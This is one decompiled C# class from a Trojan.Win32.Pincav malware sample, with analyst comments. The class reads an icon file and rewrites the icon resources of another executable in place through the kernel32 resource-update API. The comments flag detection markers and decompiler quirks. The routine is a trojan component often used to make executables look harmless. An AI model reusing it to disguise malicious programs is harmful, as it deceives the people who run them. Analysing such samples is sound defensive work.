MalwareSourceCode/MSIL/Trojan/Win32/P/Trojan.Win32.Pincav.cmfl-3fa99ddd788dbbe91390f940f247e68ee6ef463b9a024c2781a0267f9ccc9501/_0006.cs

// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Random, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 29923E1C-4A06-46C3-B41C-690DFD9D7396
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Pincav.cmfl-3fa99ddd788dbbe91390f940f247e68ee6ef463b9a024c2781a0267f9ccc9501.exe
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using System.Security;
// Obfuscated helper that rewrites the icon resources of a file on disk through the
// kernel32 resource-update API (BeginUpdateResource / UpdateResource / EndUpdateResource).
// The replacement images come from a second file whose layout matches the .ico format
// (inferred from the struct shapes below; the decompiler could not recover any names).
//
// Analyst notes:
//  - Observable markers of this routine are the three kernel32 imports plus the integer
//    resource types 14 (RT_GROUP_ICON) and 3 (RT_ICON) passed to UpdateResource.
//  - The target file is modified in place, so its hash changes; an embedded
//    Authenticode signature, if any, would presumably no longer validate.
//  - NOTE(review): callers are not in this file. What the sample uses the icon swap for
//    cannot be established from here.
public sealed class \u0006
{
// Empty constructor kept by the compiler; every member that does work is static.
[DebuggerNonUserCode]
public \u0006()
{
}
// Convenience overload: forwards to the four-argument form with 1 as the group
// resource name and 1 as the first image resource ID.
public static void \u0002(string _param0, string _param1) => \u0006.\u0002(_param0, _param1, 1U, 1U);
// Writes the icon group and its images into the resource section of a file.
//   _param0 : path handed to BeginUpdateResource (the file whose resources are rewritten).
//   _param1 : path read with File.ReadAllBytes and parsed as the icon source.
//   _param2 : integer name of the type-14 (group icon) resource.
//   _param3 : resource ID of the first type-3 (icon image) resource; image i gets _param3 + i.
// NOTE(review): none of the three native return values is checked, and the imports do
// not request SetLastError, so a failed update (for example a NULL handle from
// BeginUpdateResource) passes silently.
public static void \u0002(string _param0, string _param1, uint _param2, uint _param3)
{
// Parse the icon source file into header, directory entries and raw image blobs.
\u0006.\u000E obj = \u0006.\u000E.\u0002(_param1);
// Second argument false = keep the resources the target file already has.
IntPtr num1 = \u0006.\u0002.\u0002(_param0, false);
// Serialized group directory whose entries reference IDs _param3, _param3 + 1, ...
byte[] numArray1 = obj.\u0002(_param3);
IntPtr num2 = num1;
// 14 is the integer resource type RT_GROUP_ICON.
IntPtr num3 = new IntPtr(14L);
IntPtr num4 = num3;
IntPtr num5 = new IntPtr((long) _param2);
IntPtr num6 = num5;
byte[] numArray2 = numArray1;
int length1 = numArray1.Length;
// Queue the group directory under type 14, name _param2, language 0.
\u0006.\u0002.\u0002(num2, num4, num6, (short) 0, numArray2, length1);
// One type-3 resource per image held by the parsed icon file.
int num7 = checked (obj.\u0002() - 1);
int num8 = 0;
while (num8 <= num7)
{
byte[] numArray3 = obj.\u0002(num8);
IntPtr num9 = num1;
// 3 is the integer resource type RT_ICON.
num5 = new IntPtr(3L);
IntPtr num10 = num5;
// Resource ID for this image; must match the ID written into the group entry.
num3 = new IntPtr(checked ((long) _param3 + (long) num8));
IntPtr num11 = num3;
byte[] numArray4 = numArray3;
int length2 = numArray3.Length;
\u0006.\u0002.\u0002(num9, num10, num11, (short) 0, numArray4, length2);
checked { ++num8; }
}
// Second argument false = do not discard; the queued updates are written to the file.
\u0006.\u0002.\u0002(num1, false);
}
// P/Invoke declarations for the kernel32 resource-update functions.
// SuppressUnmanagedCodeSecurity removes the runtime's unmanaged-code permission
// stack walk for these calls.
[SuppressUnmanagedCodeSecurity]
private sealed class \u0002
{
[DebuggerNonUserCode]
public \u0002()
{
}
// BeginUpdateResource(fileName, deleteExistingResources) -> update handle.
[DllImport("kernel32", EntryPoint = "BeginUpdateResource")]
public static extern IntPtr \u0002(string _param0, [MarshalAs(UnmanagedType.Bool)] bool _param1);
// UpdateResource(handle, type, name, language, data, dataLength).
// SizeParamIndex = 5 ties the marshalled array length to the last parameter.
[DllImport("kernel32", EntryPoint = "UpdateResource")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool \u0002(
IntPtr _param0,
IntPtr _param1,
IntPtr _param2,
short _param3,
[MarshalAs(UnmanagedType.LPArray, SizeParamIndex = 5)] byte[] _param4,
int _param5);
// EndUpdateResource(handle, discard) commits or abandons the queued updates.
[DllImport("kernel32", EntryPoint = "EndUpdateResource")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool \u0002(IntPtr _param0, [MarshalAs(UnmanagedType.Bool)] bool _param1);
}
// Header read from offset 0 of the icon source file: three 16-bit fields.
// Shape matches ICONDIR (reserved, type, count); the roles of the first two fields are
// inferred, as only the third is used in this file.
private struct \u0003
{
public ushort \u0002;
public ushort \u0003;
// Number of images; drives every loop and array size in the parser class.
public ushort \u0005;
}
// Per-image directory entry as stored in the icon source file.
// Shape matches ICONDIRENTRY; only the last two fields have a role fixed by this file.
private struct \u0005
{
public byte \u0002;
public byte \u0003;
public byte \u0005;
public byte \u0008;
public ushort \u0006;
public ushort \u000E;
// Length in bytes of the image data (used as the copy length by the parser).
public int \u000F;
// Byte offset of the image data inside the source file (used as the copy offset).
public int \u0002\u2000;
}
// Per-image entry written into the type-14 group resource. Pack = 2 keeps the trailing
// ushort directly after the int. Shape matches GRPICONDIRENTRY (inferred).
[StructLayout(LayoutKind.Sequential, Pack = 2)]
private struct \u0006
{
public byte \u0002;
public byte \u0003;
public byte \u0005;
public byte \u0008;
public ushort \u0006;
public ushort \u000E;
public int \u000F;
// Resource ID of the matching type-3 resource (base ID + image index).
public ushort \u0002\u2000;
}
// Structure overlaid on the first bytes of each image blob. Shape matches
// BITMAPINFOHEADER (inferred); only the two ushort fields are read in this file.
private struct \u0008
{
public uint \u0002;
public int \u0003;
public int \u0005;
public ushort \u0008;
public ushort \u0006;
public uint \u000E;
public uint \u000F;
public int \u0002\u2000;
public int \u0003\u2000;
public uint \u0005\u2000;
public uint \u0008\u2000;
}
// In-memory form of the icon source file: header, directory entries and one byte
// array per image. Instances are only created through the static parser below.
private sealed class \u000E
{
// File header.
private \u0006.\u0003 \u0002;
// Directory entries, one per image.
private \u0006.\u0005[] \u0003;
// Raw image data, same index as the directory entries.
private byte[][] \u0005;
private \u000E() => this.\u0002 = new \u0006.\u0003();
// Image count taken from the header.
public int \u0002() => (int) this.\u0002.\u0005;
// Raw bytes of the image at the given index.
public byte[] \u0002(int _param1) => this.\u0005[_param1];
// Reads the file at _param0 and parses it into header, entries and image blobs.
// NOTE(review): the header and entry reads are not checked against src.Length, so a
// truncated or malformed file can make PtrToStructure read past the pinned array.
// Buffer.BlockCopy validates its own range and throws instead. The pinned handle is
// not released if any of these calls throws (no try/finally).
public static \u0006.\u000E \u0002(string _param0)
{
\u0006.\u000E obj = new \u0006.\u000E();
byte[] src = File.ReadAllBytes(_param0);
// Pin the file bytes so the marshaller can read structures from a stable address.
GCHandle gcHandle = GCHandle.Alloc((object) src, GCHandleType.Pinned);
obj.\u0002 = (\u0006.\u0003) Marshal.PtrToStructure(gcHandle.AddrOfPinnedObject(), typeof (\u0006.\u0003));
// "- 1 + 1" nets out to the image count (decompiler rendering of an upper-bound size).
obj.\u0003 = new \u0006.\u0005[checked ((int) obj.\u0002.\u0005 - 1 + 1)];
obj.\u0005 = new byte[checked ((int) obj.\u0002.\u0005 - 1 + 1)][];
// num1 = running byte offset of the next directory entry; starts right after the header.
int num1 = Marshal.SizeOf((object) obj.\u0002);
Type type = typeof (\u0006.\u0005);
int num2 = Marshal.SizeOf(type);
int num3 = checked ((int) obj.\u0002.\u0005 - 1);
int index = 0;
while (index <= num3)
{
\u0006.\u0005 structure = (\u0006.\u0005) Marshal.PtrToStructure(new IntPtr(checked (gcHandle.AddrOfPinnedObject().ToInt64() + (long) num1)), type);
obj.\u0003[index] = structure;
// Allocate and copy the image using the length and offset fields of the entry.
obj.\u0005[index] = new byte[checked (structure.\u000F - 1 + 1)];
Buffer.BlockCopy((Array) src, structure.\u0002\u2000, (Array) obj.\u0005[index], 0, structure.\u000F);
checked { num1 += num2; }
checked { ++index; }
}
gcHandle.Free();
return obj;
}
// Serializes the data for the type-14 group resource: the file header followed by one
// group entry per image, with IDs _param1, _param1 + 1, ...
// The checked ushort cast throws OverflowException if an ID exceeds 65535.
public byte[] \u0002(uint _param1)
{
byte[] numArray = new byte[checked (Marshal.SizeOf(typeof (\u0006.\u0003)) + Marshal.SizeOf(typeof (\u0006.\u0006)) * this.\u0002() - 1 + 1)];
GCHandle gcHandle1 = GCHandle.Alloc((object) numArray, GCHandleType.Pinned);
// Header goes first, copied unchanged from the parsed file.
Marshal.StructureToPtr((object) this.\u0002, gcHandle1.AddrOfPinnedObject(), false);
// num1 = running write offset inside numArray.
int num1 = Marshal.SizeOf((object) this.\u0002);
int num2 = checked (this.\u0002() - 1);
int index = 0;
while (index <= num2)
{
\u0006.\u0006 structure = new \u0006.\u0006();
\u0006.\u0008 obj = new \u0006.\u0008();
// NOTE(review): as decompiled, the pinned object is a boxed copy of obj, so the bytes
// copied in below land in that copy and the local obj appears to stay zeroed. The two
// ushort fields taken from it would then be 0 in every group entry. Confirm against
// the IL before relying on this as an artifact.
GCHandle gcHandle2 = GCHandle.Alloc((object) obj, GCHandleType.Pinned);
Marshal.Copy(this.\u0002(index), 0, gcHandle2.AddrOfPinnedObject(), Marshal.SizeOf(typeof (\u0006.\u0008)));
gcHandle2.Free();
// The four byte fields and the data length come from the file's directory entry.
structure.\u0002 = this.\u0003[index].\u0002;
structure.\u0003 = this.\u0003[index].\u0003;
structure.\u0005 = this.\u0003[index].\u0005;
structure.\u0008 = this.\u0003[index].\u0008;
// The two ushort fields come from the image-header overlay (see note above).
structure.\u0006 = obj.\u0008;
structure.\u000E = obj.\u0006;
structure.\u000F = this.\u0003[index].\u000F;
// The file offset is replaced by the resource ID of the matching type-3 resource.
structure.\u0002\u2000 = checked ((ushort) ((long) _param1 + (long) index));
Marshal.StructureToPtr((object) structure, new IntPtr(checked (gcHandle1.AddrOfPinnedObject().ToInt64() + (long) num1)), false);
checked { num1 += Marshal.SizeOf(typeof (\u0006.\u0006)); }
checked { ++index; }
}
gcHandle1.Free();
return numArray;
}
}
}